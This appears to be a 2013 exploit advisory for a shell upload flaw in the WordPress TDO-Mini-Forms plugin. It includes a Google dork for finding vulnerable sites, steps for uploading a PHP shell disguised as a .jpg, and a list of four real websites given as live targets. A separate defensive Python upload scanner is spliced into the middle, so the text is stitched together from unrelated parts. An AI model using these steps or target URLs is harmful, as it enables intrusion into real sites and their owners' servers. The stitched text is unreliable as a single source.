WordPress TDO-Mini-Forms plugin suffers from a remote shell upload vulnerability. Note that this advisory has site-specific information.
###############################################################
# Exploit Title: Wordpress TDO-Mini-Forms Plugin Arbitrary File Upload Vulnerability
# Author: Ashiyane Digital Security Team
# Date: 12/09/2013
# Vendor Homepage: http://thedeadone.net
# Software Link : http://cznic.dl.sourceforge.net/project/filip/wordpress/tdo-mini-forms.0.13.9.zip
# Google dork: inurl:/wp-content/plugins/tdo-mini-forms/
# Tested on: Windows/Linux
###############################################################
1) Exploit :
= = = = = =
1. Go to http://[target]/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=[ID]&index=
2. Click Browse and select your shell script (ex: file.php.jpg)
3. Click Upload Now to upload
# Uploaded files :
http://127.0.0.1/wp-content/uploads/tdomf/tmp/[FormID]/[YourIP]/file.php.jpg
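As an added defender-side example (not part of this advisory), the following Python script walks the upload path named above and flags files whose name carries a PHP-like inner extension or whose bytes contain a PHP open tag; the directory layout and sample files in demo() are constructed.

```python
import re
import tempfile
from pathlib import Path

# Inner extensions that a misconfigured web server may hand to the PHP
# interpreter even when a harmless suffix (.jpg, .png ...) comes last.
PHP_EXTENSIONS = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar"}
PHP_OPEN_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def suspicious_name(name: str) -> bool:
    """True if any extension in the name, not just the last, looks like PHP."""
    parts = name.lower().split(".")
    return any("." + p in PHP_EXTENSIONS for p in parts[1:])


def suspicious_content(path: Path, limit: int = 1 << 20) -> bool:
    """True if the first `limit` bytes of the file contain a PHP open tag."""
    with path.open("rb") as fh:
        return PHP_OPEN_TAG.search(fh.read(limit)) is not None


def scan_uploads(root) -> list[tuple[str, str]]:
    """Walk the tdomf temp upload tree; return (relative path, reason) pairs."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if suspicious_name(path.name):
            findings.append((rel, "php-like inner extension"))
        elif suspicious_content(path):
            findings.append((rel, "php open tag in body"))
    return findings


def demo() -> list[tuple[str, str]]:
    """Constructed sample tree mirroring uploads/tdomf/tmp/[FormID]/[IP]/."""
    with tempfile.TemporaryDirectory() as tmp:
        d = Path(tmp, "1", "203.0.113.5")  # constructed form id and client IP
        d.mkdir(parents=True)
        (d / "holiday.jpg").write_bytes(b"\xff\xd8\xff\xe0 benign jpeg header")
        (d / "file.php.jpg").write_bytes(b"<?php echo 'not an image'; ?>")
        (d / "avatar.png").write_bytes(b"\x89PNG\r\n\x1a\n<?php echo 'hidden'; ?>")
        return scan_uploads(tmp)


if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{rel}: {reason}")
```

Run it against the real wp-content/uploads/tdomf/tmp directory by calling scan_uploads() with that path; a name-based hit is worth a second look even when the body check is negative.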
2) Exploit demo :
= = = = = = = = =
http://moiatadieta.com/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
http://100mostbeautifulbabies.com/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
http://pawsintograce.com/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
http://activeyouth.co.uk/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
# #### #### #### #### #### #### #### #### #
# BY T3rm!nat0r5
# E-mail : poya.terminator@gmail.com
# #### #### #### #### #### #### #### #### #